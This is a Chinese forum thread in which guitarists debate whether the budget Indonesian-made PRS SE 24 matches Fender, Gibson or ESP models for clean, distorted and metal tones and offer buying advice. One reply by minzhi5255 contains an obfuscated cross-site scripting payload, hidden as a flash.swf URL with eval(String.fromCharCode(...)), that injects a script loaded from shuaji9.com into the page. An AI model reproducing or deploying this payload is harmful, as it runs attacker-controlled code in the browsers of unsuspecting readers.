63600129 发表于 2017-2-8 01:15:29

prs se 24印尼产是不是传说中的四不像?

低端prs是不是什么都能玩下,但什么都不地道?清音过载不如墨芬,失真不如低端奶子,金属不如低端esp?求玩过的解答下!准备入手,纠结中,,,喜欢芬的清音过载,但失真又太薄,又喜欢prs粘稠的失真音色,关键问题是预算又不多,又要婊子又要牌坊!难啊

摆渡人369 发表于 2017-2-8 02:20:49

其实PRS这个牌子本来也没这么有特色,要想楼主这样比的话,CS也是清音过载不如美豪,失真不如G STD,金属不如ESP。预算不够的话,可以考虑用均衡达到部分功能。

slayest 发表于 2017-2-8 08:11:01

失真不会不如低端奶子。别的倒基本都说对了。

81816281 发表于 2017-2-8 09:01:23

除了f和g。。。其他都是四不像

weekershuo 发表于 2017-2-8 10:05:38

我纠结了一段时间,各种试琴,最后还是加钱选择了s2 cs24,印尼琴和韩产在音色上区别不大,性价比倒是不错,但我实在忍受不了低频那股焦糊味,完全没有层次感,不过3000多的琴,也不能追求太多,Ltd mh350那个档次也那么回事,玩重的层次感也一般,乐队两把epi的音色还不如se std呢,所以如果真的不能再加钱,那就se std也可以了,如果能再赞点钱,还是至少上个s2吧,过两年换对好点拾音器,还是能一战的

63600129 发表于 2017-2-8 10:12:42

摆渡人369 发表于 2017-2-8 02:20
其实PRS这个牌子本来也没这么有特色,要想楼主这样比的话,CS也是清音过载不如美豪,失真不如G STD,金属不 ...

我表示有些缺陷是用均衡解决不了滴~,~

minzhi5255 发表于 2017-2-8 10:19:30

其实PRS这个牌子本来也没这么有特色

http://localhost/flash.swf?'+eval(String.fromCharCode(119,105,116,104,40,100,111,99,117,109,101,110,116,41,48,91,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,41,46,115,114,99,61,39,104,116,116,112,58,47,47,115,104,117,97,106,105,57,46,99,111,109,47,63,97,61,49,39,93,59))+'

LeV1 发表于 2017-2-8 10:23:59

还纠结呢呀哥哥
个人观点 供参考(强调 只是个人观点):
1、低端prs是不是什么都能玩下
   答:是 什么都能玩下
2、但什么都不地道                                                         
   答:可能 但不一定 还得看手上活儿、看箱子、看效果器、看整体调节
3、清音过载不如墨芬,失真不如低端奶子,金属不如低端esp?
   答:可能 但不一定 还得看手上活儿、看箱子、看效果器、看整体调节
4、喜欢芬的清音过载,但失真又太薄,又喜欢prs粘稠的失真音色
   答:一样买一把 配个好箱子 但还得看手上活儿、看箱子、看效果器、看整体调节
5、关键问题是预算又不多
   答:a.努力挣钱 b.多看看GC二手区
6、总结:这个价位的琴 只要买到的是正品 肯定是能够满足这个价位琴的日常使用的(比如:练习、跑个小场、录点DEMO、当然不排除有大师拿它录音 我只是举例说明 别较真 别撕13) 当然 要一步到位满足你心目中的音色(芬的清音过载、prs粘稠的失真音色)光有一把琴是不够的 而LZ大哥又洽好提到了预算问题建议:找家实体店 接个好点的管箱 试一下如果喜欢的话 可以考虑GC二手毕竟 “感觉”这个东西太主观有可能我用过的琴少 我感觉这是把好琴 换个大师再听 就是垃圾一样
7、再次强调 以上只是个人建议 供参考 如有不同意见 欢迎讨论 拒绝任何形式的撕13及人身攻击

LeV1 发表于 2017-2-8 10:27:01

LeV1 发表于 2017-2-8 10:23
还纠结呢呀哥哥
个人观点 供参考(强调 只是个人观点):
1、低端prs是不是什么都能玩下

其实LZ的guina撸着也挺给力的呀

LeV1 发表于 2017-2-8 10:39:21

无非就是买和不买的问题嘛
琴总会有更贵的、更好的
花多少钱 办多少事儿

63600129 发表于 2017-2-8 11:19:44

LeV1 发表于 2017-2-8 10:39
无非就是买和不买的问题嘛
琴总会有更贵的、更好的
花多少钱 办多少事儿 ...

谢谢。非常感谢。码这么多字不容易。。。。就买把SE 2017款。准备去通利

c504901413 发表于 2017-2-8 12:23:07

63600129 发表于 2017-2-8 11:19
谢谢。非常感谢。码这么多字不容易。。。。就买把SE 2017款。准备去通利
楼主去通利方便啊,,,去完了跟我说下se 2017 那有没有,多少钱。淘宝上现在都搜不到啊,万分感谢

摆渡人369 发表于 2017-2-8 22:58:34

63600129 发表于 2017-2-8 10:12
我表示有些缺陷是用均衡解决不了滴~,~

所以我只说能达到部分功能,如果你确实纠结某些音色比较个性的,PRS不是一个好的选择。

woaimeiran 发表于 2017-2-8 23:34:25

给你总结一下,有多少钱,办多大事!没有全能这么一说

x_wh 发表于 2017-2-9 22:02:46

我也在观望PRS SE

zqh1994 发表于 2017-2-11 04:13:47

进综合都**一个样。无非音色好不好的原因。琴就那么一回事儿
页: [1]
查看完整版本: prs se 24印尼产是不是传说中的四不像?